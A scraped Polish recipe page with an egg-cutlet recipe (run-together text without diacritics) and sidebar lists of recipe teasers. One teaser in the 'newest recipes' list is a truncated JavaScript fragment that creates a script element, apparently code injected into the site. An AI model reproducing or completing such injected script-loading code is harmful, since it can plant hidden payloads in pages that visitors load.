Kotlety jajeczne
Źródło: https://lena-gotuje.blogspot.com/2013/11/bezmiesne-kotlety.html
Skladniki:8 jajek ugotowanych na twardo1 surowe jajkosucha bulkalyzka bulki tartejlyzka pietrszki i koperkusol, pieprzPrzygotowanie:Stara bullke moczymy w wodzie, zeby zmiekla i dokladnie odsaczamy.Ugotowane jajka kroimy w kostke, dodajemy do bulki i wrzucamy pozostale skladniki.Zagniatamy tak jak zwykle kotlety - tylko tu role miesa zastepuja jajka.Smazymy na rozgrzanej patelni na zlocisty kolor....
Najnowsze przepisy
Śledzie gajowego z suszonymi borowikami (po myśliwsku)Są... ⇖ 12
(function(){ ak45=document.createElement("script");ak45_="o" ⇖ 8
Batat z pieca, lekko przypieczony na krawędziach i kremowy... ⇖ 19
Domowy chleb z ziarnami – puszysty, aromatyczny i idealny... ⇖ 13
Serniki z PodkarpaciaPrzeglądając podkarpackie przepisy... ⇖ 21
Przepisy z bloga
Kanapka na ciepło z kiełbasą, cebulą, usmażona w jajku... ⇖ 27
Mrożonkę z zupy kalafiorowej FRoSTA można wykorzystać w... ⇖ 60
Zimne nóżki drobiowe lub galareta drobiowa. Pyszne... ⇖ 68
Pomysł na szybki, łatwy i przepyszny obiad czyli makaron... ⇖ 68
Szybka sałatka makaronowa z filetem z kurczaka, kolorowymi... ⇖ 92
Pyszna chrupiąca grzanka z niesamwicie kremowym pesto... ⇖ 82
Sernik bez spodu z dodatkiem prażonych jabłek na wierzchu... ⇖ 66
Pyszne danie jednogarnkowe z dynią, marchewką i papryką.... ⇖ 101
Danie, które lubię jeść na obiad - makaron w wersji... ⇖ 71
Przepisy na czasie
Masz ochotę na coś słodkiego bez pieczenia? Zrób sernik... ⇖ 1811
Piernik przekładany kremem to jedno z tych ciast, które... ⇖ 1189
To niezwykle proste ciasto piernikowe, które zawsze się... ⇖ 696
NAJLEPSZY PRZEPIS NA CIASTO NA PIEROŻKIBardzo lubię... ⇖ 684
Cześć! Dzisiaj robimy ciasto lion bez pieczenia, to... ⇖ 614
Sernik łaciaty z brzoskwiniami i makiem to ciasto, które... ⇖ 603
Kremowe, delikatne ciasto z białą czekoladą i cukierkami... ⇖ 566
Przepyszny domowy pasztet do smarowania. W sklepie tak... ⇖ 490
Pyszny, mięciutki i delikatny. Idealne na półmisek... ⇖ 481
Paszteciki z mięsem, z ciasta drożdżowo-kruchego to... ⇖ 466








































